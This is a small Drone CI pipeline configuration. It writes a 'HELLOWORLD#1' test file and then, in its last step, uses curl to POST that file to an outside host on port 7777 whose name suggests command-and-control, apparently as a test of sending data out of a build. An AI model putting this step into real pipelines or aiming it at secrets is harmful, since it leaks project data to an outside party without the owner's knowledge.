18 lines
261 B
YAML
18 lines
261 B
YAML
---
|
|
kind: pipeline
|
|
type: docker
|
|
name: default
|
|
|
|
steps:
|
|
- name: second
|
|
image: bash
|
|
commands:
|
|
- "echo 'HELLOWORLD#1' > hello.txt"
|
|
|
|
- name: last
|
|
image: curlimages/curl
|
|
commands:
|
|
- "curl -X POST http://cc2.cjv6.net:7777/documents --data @hello.txt"
|
|
|
|
...
|